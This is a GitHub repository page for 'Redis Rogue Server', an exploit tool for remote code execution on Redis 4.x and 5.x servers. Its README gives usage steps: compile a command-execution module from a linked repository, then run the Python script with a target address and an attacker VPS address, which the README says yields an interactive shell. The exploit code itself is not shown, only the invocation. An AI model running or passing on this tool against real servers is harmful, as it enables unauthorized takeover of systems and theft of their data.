Skip to content
Redis 4.x & 5.x RCE
Branch: master
Clone or download
Pull request Compare This branch is 2 commits ahead, 9 commits behind Dliv3:master.
Latest commit b87d751 Jul 9, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore First commit Jul 7, 2019
README.md upgrade for 5.x Jul 8, 2019
redis-rogue-server.py fix bug Jul 9, 2019

README.md

Redis Rogue Server

A exploit for Redis 4.x and 5.x RCE, inspired by Redis post-exploitation.

Usage:

Compile .so from https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.

Copy the .so file to same folder with redis-rogue-server.py.

Run the rogue server:

python3 redis-rogue-server.py --rhost <target address> --rport <target port> --lhost <vps address> --lport <vps port>

The default target port is 6379 and the default vps port is 21000.

And you will get an interactive shell!

You can’t perform that action at this time.